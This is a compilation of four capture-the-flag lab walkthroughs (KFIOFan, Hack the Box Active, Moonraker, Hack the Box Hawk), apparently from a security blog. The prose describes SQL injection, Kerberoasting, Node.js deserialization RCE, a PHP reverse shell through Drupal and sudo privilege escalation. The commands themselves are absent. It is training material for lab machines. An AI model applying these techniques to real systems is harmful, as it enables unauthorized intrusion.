KFIOFan:1 Vulnhub Walkthrough

Hello friends!! Today we are going to take another boot2root challenge known as KFIOFan. This lab is design in French language and involve Geographical coordinates factor of France to Begin this CTF where you have to find 4 flags by using your web penetration testing skill because this machine is vulnerable to SQL.

Official Description : Two french people want to start the very first fanclub of the youtuber Khaos Farbauti Ibn Oblivion. But they’re not very security aware ! (IMPORTANT NOTE : The whole challenge is in french, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)

You can download this VM here.

Penetration Methodology

Network Scanning

  • Open port and Running Service (Nmap)

Enumeration

  • Abusing Http service for obtaining Credential
  • Use robot.txt for first flag

Exploit

  • Exploiting SQL vulnerability
  • Obtain SSH RSA_Key
  • SSH Login
  • Catch another flag

Privilege Escalation

  • Check Sudo rights
  • Spwan root access
  • Capture the last flag

Walkthrough

Network Scanning

Let’s start off with scanning the network to find our target.

So from nmap we found two ports (22, 80) are open in the target’s machine, therefore let’s navigate to port 80 in the browser.

Enumeration

On exploring port 80, we notice it required authentication but we don’t know that. Moreover there was a text message (This site says: “48.416667 -0.916667”) which was pointing towards some Geographical coordinates.

When we canceled the authentication page, we saw a message in French language which was saying “Let me guess Bob, did you lose your password again? LOL”. Here we considered Bob as authorized username.

On searching 48.416667 -0.916667 coordinates in Google map, we get the location “Levaré” which could be the possible password for user Bob.

Hmmmm!! So our prediction was true and we successfully bypass HTTP authentication using Bob: Levaré

Note: Well this was not that much easier because on reboot this machine the Geo coordinates gets changed and you will get the password accordingly.

Luckily, on exploring /robot.txt, I found our first flag randomly which was in French language and again I translate it here:

FLAG1: Congratulations you found the first flag! (Yes I know you’re hoping for a clue but at least you have the right reflexes!)

 

As officially describe above “Two french people want to start the very first fanclub of the youtuber” and from the given web page we can easily read the name of that two people (Alice and Bob) are usernames.

Exploit 

Again I translate the whole text of this web page and conclude user “Alice” holds some very crucial information or any important file such as SSH key.

A link on Khaosearch brings me on the search form for the CTF author’s YouTube channel, without wasting time I check for sql injection by injecting following query:

Lol J ! It was vulnerable to SQL injections, let’s exploit quickly.

With the help of following query we try to all table and column names from inside the database.

I stumped when I saw an entry for SSH_Key, then I decided to check it, as it seems the most exciting.

I found another link as Alice when inject following query to check ssh_key

Alice was holding Private SSH_Key which should be open properly, therefore I visit source code of this page here.

Then copy the RSA Key from —–BEGIN RSA PRIVATE KEY—– to —–END RSA PRIVATE KEY—– and past in a text file as “id_rsa” then set permission 600 for proper authentication.

Privilege Escalation

 

Now then connect to ssh using above key and run following command:

So we have successfully connected to ssh and found 3rd flag also.

FLAG 3: Congratulations for coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!

For finding 4th flag we need to escalate root privilege, let’s identify sudo rights for alice with the help of following command.

Hmmm!! So here alice can run awk as root without using password and we can easily spawn root shell by exploit this permission

FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!

Note: On rebooting this VM machine the Geo coordinates get changed each time which will also affect password and SSH key and you get new password and SSH_key each time.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Hack the Box: Active Walkthrough

Today we are going to solve another CTF challenge “Active”. Active is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt file

Penetration Methodologies

Scanning Network

  • Open ports and Running services (Nmap)

Enumeration

  • Identify share files (Linux4enum)
  • Access share file via Anonymous login (smbclient)
  • Decrypting cpassword (Gpprefdecrypt.py)

Access Victim’s Shell via SMB connect

  • Access share file user login
  • Get User.txt

Privilege Escalation

  • Find Service Principal Names (py)
  • Crack the hash (Hashcat)
  • Psexec Exploit (Metasploit)
  • Get root.txt

Walkthrough

Scanning Network

Note: Since these labs are online available therefore they have a static IP. The IP of Active is 10.10.10.100

Let’s start off with our basic nmap command to find out the open ports and services.

As you can observe from Nmap scanning result, there are so many open ports along with their running services, the OS is Microsoft Windows server 2008:r2:sp1 and you can also read the domain name “active.htb”.

Enumeration

I try eternal blue attack when I saw port 445 was open but I guess this was Patched version of SMB, therefore I have to start with enum4linux script. As we all know it is the best script for SMB enumeration.

It has shown anonymous login for /Replication share file.

Then I try to access /Replication with the help smbclient and run the following command to access this directory via anonymous account:

Here I downloaded Groups.xml file which I found from inside the following path:

So here I found cpassword attribute value embedded in the Groups.xml for user SVC_TGS.

Therefore I download a python script “Gpprefdecrypt” from GitHub to decrypt the password of local users added via Windows 2008 Group Policy Preferences (GPP) and obtain the password: GPPstillStandingStrong2k18.

Access Victim’s Shell via SMB connect

Using above credential we connect to SMB with the help of following command and successfully able to catch our 1st flag “user.txt” file.

Now, it’s time to hunt root.txt file and as always seen that for obtain root.txt file we need to escalated root privilege, therefore let’s add Host_IP and Host_name inside /etc/hosts file in our local machine.

Privilege Escalation

In nmap scanning result we saw port 88 was open for Kerberos, hence their much be some Service Principal Names (SPN) that are associated with normal user account. Therefore we downloaded and install impacket from Github for using its python class GetUserSPN.py

I copied the hash value into a text file “hash.txt” for its decryptions.

Then with the help of hashcat we find out the hash mode and as result it shown 13100 for Kerberos 5 TGS-REP etype 23

Finally, it was time to crack the hashes and obtain the password by using rockyou.txt wordlist.

Hurray!!! We got it, Ticketmaster1968 for administrator.

Without wasting time I load metaploit framework and run following module to spawn full privilege system shell.

BOOOMMM…………………

Now we are inside the root shell, let’s chase towards root.txt file and finish this challenge.

Yuppieee! We found our 2nd flag the root.txt file form inside /Users/Administrator/Desktop.

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

Moonraker:1 Vulnhub Walkthrough

Hack into the Moonraker system and discover who’s behind these menacing plans once and for all. Find and destroy the Villain before it’s too late. You’ve received intelligence of a new Villain investing heavily into Space and Laser Technologies. Although the Villain is unknown we know the motives are ominous and apocalyptic. The challenge is to get root on the Targeted Virtual Machine and read the flag.txt within that directory.

Download it from here: https://www.vulnhub.com/entry/moonraker-1,264/

Penetrating Methodology:

  • Network Scanning (Netdiscover & Nmap)
  • Web directory enumeration (Dirb)
  • Tail off apache2 access logs.
  • Browsing through discovered directories.
  • Finding Login Credentials for CouchDB’s Login.
  • Fauxton Login Page Link.
  • Checking Various Directories over browser.
  • Finding Login Credentials.
  • Logging into Node.js express framework.
  • Capturing Cookie using Burpsuite.
  • Using Node.js deserialization exploit for RCE.
  • Converting Decimal value to ASCII text.
  • Using a script to Convert ASCII text to Decimal value.
  • Base64 encoding using echo.
  • Getting reverse shell over netcat listener.
  • Converting Hash string using John the Ripper tool
  • Getting root access.
  • Reading the flag.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.

We found our target IP –> 192.168.1.110

Our next motive is to scan the target IP with nmap.

The NMAP scan output shows various open ports: 22(ssh), 80(http), 110(pop3), 3000(http), 4369(epmd), 5984(couchdb).

From NMAP Scan output, we saw port 80 is open. Therefore we navigate to port 80 in the web browser. But it was not much of a help to move ahead.

Now we thought of enumerating for accessible directories on the Target Machine with the help of following command.

After recursively enumerating, we found a useful directory /services as highlighted.

Let’s just browse the found directory /services in the browser where at bottom of the webpage we saw an SEND AN INQUIRY Hyperlink. Let’s find out where it will lead us by clicking on it.

So it opened a SERVICES INFORMATION REQUEST FORM as shown in the image. We noticed that someone will check our web-based enquiry and will contact us in under 5minutes. This strikes us that some kind a logs will be made. But the question is where?

We have filled the enquiry form using the html code with image tag as shown in the image.

Before Clicking Submit to Sales Rep! We have restarted apache2 service, because if any logs will be made, we can easily see them by accessing apache2 access.log. After clicking Submit, it has displayed thanks for your inquiry message as shown in the image.

We have just tail off the access log of apache2 by using command.

The log formed exposed a new webpage as highlighted in the image.

Let’s just find out where the new webpage is going to take us. For that we opened it in the browser.

So it leads us to Sales Admin Interface. This looks interesting and might be holding some great clues.

Next thing we opened CouchDB Notes and got some hints about Login Credentials for Username: jaws and Password: jaws girlfriend name + x99. Here we Google for jaws girlfriends name which came out to be dolly.

We will be requiring these found Credentials to log into Fauxton which is included in Apache CouchDb. To know more about Fauxton and CouchDB we have searched about them on google and find out a hint on how to open a CouchDB Login Page.

 Since port 5984 is open. We are able to open the CouchDB Login Page.

 Here we have used Login Credentials as follows:

Booyeah!! We have successfully logged in. Now let’s check out the docs inside these 3 databases.

The link database came out to be useful. Looking through the documents inside the link database, since every document contains a directory link but the highlighted one might be give us another clue for our next step.

So the link we have found in the highlighted document is shown in the image. Let’s copy and open this link in the browser.

So the above link opened an OFFER LETTER ARCHIVE BACKUP WEBPAGE. This is interesting, let’s check out what’s hiding in these offer letters.

Woah!! All the offer letters contains a Username and Password. But the one we have used is shown in the image.

From the NMAP Scan output, we knew port 3000 holds a Node.js framework. So we browse the Target IP on port 3000 on the browser and encountered a login portal. Credentials use to log in are as follows:

After successfully logging in, we are displayed a message shown in the image. This page seems of no use but after spending time figuring out what to do next it became very interesting.

Time to Launch Burp Suite and intercept the request of this page. After intercepting we saw a base64 encoded line in Cookie: profile as you can see in the image. Here we will be inserting node.js deserialization exploit in base64 encoded form. Let’s begin with the process.

From the image you can figure out that we will copy a Node.js deserialization exploit for Remote Code Execution.

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/

After copying it, let’s convert the Decimal value into ASCII text using a converter available online. And don’t forget to copy the ASCII text.

Using nano, we have created a file and pasted the ASCII text copied. Here we have given our Kali Linux IP in host and set port to 1337 just save it.

So we have created a script exploit.py which will convert the ASCII text to Decimal value and it will also put COMMA in between every Decimal value converted. Whereas we are using echo command to convert the Decimal value into Base64 encoded string. And copy the whole base64 string.

Set the Copied base64 string into Cookie: profile in the request intercepted in the Brupsuite and before forwarding the request just execute a netcat listener over port 1337.

Therefore we got a reverse shell on our netcat listener. To spawn the shell we have used python bin bash one liner. 

After recursively enumerating we found four mailboxes in /var/mail but the problem is they lack in permissions. After knowing about CouchDb’s Configuration, we come across that CouchDb’s default installation directory is /opt/couchdb and it reads configuration file from this directory etc/local.ini.

Let’s tail off the contents in local.ini.

After running this command, it displayed another Login Credential as shown in the image.

Then with the following command we switch the user and logging in as user hugo.

Reading the mails of hugo, we were brought to notice that Message 2 is interesting as it contains password to root in hash and also tells us to ADD ‘VR00M’ after roots password. Time to crack the password, to do that we have copied the password and pasted inside a file named hash.

Therefore, John the Ripper tool cracked the hash password for root i.e

Let’s again switch user and Login as root.

Booyeah!! We have successfully logged in as root and while checking through its mail directory, we have found our flag.txt file. We take a look at the content of the file and greeted with a congratulatory message.  

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge “Hawk”. Hawk is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt

Note: Since these labs are online available therefore they have static IP. The IP of Hawk is 10.10.10.102

Penetration Methodology:

  • Port scanning and IP discovery
  • Anonymous FTP Login
  • Checking file type
  • Getting Login Credentials
  • Browsing IP through port 80
  • Exploiting Drupal
  • Reading First Flag User.txt
  • Getting Login Credentials
  • Spawning TTY Shell
  • Searching exploit via Searchsploit
  • Getting root Access
  • Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).

From the NMAP Scan output we saw that ftp Port 21 is Open and the next thing that catches our eyes is it so it has Anonymous login allowed.

We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. “.drupal.txt.encand then we transferred the file to our local machine.

Since .drupa.txt.enc is encrypted. Let’s check the file type using ‘file’ command.

It came out to be openssl encoded data with salted password. Clearly we need to decrypt the file to get any further clue.

To crack this file, we have used an openssl bruteforce tool which is easily available on github. You can download it from the given below link or can run the following command for downloading and script execution.

Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123” this could be the password for CMS Login. Let’s Check it.

As port 80 is running http server, we open the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.

Oh yeah!! We have successfully logged into admin dashboard. Now go to modules and then enable the check box for Path and PHP filter.

After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.

Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.

Then select the Text format as “PHPCode”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.

 

We got a reverse connection of victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash one liner.

Inside /home/denial we have got to User.txt flag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, in this file we found the password: drupal4hawk

 

Then with the following command we switch the user and logging in as user daniel.

Here we have used Simple phyton3 commands to escape the python3 interpreter.

From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.

It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.

Afterwards we have downloaded our exploit 45506.py in the /tmp directory of target machine. Then Grant the FULL permission to the exploit and execute it using command.

Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and find our final flag.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here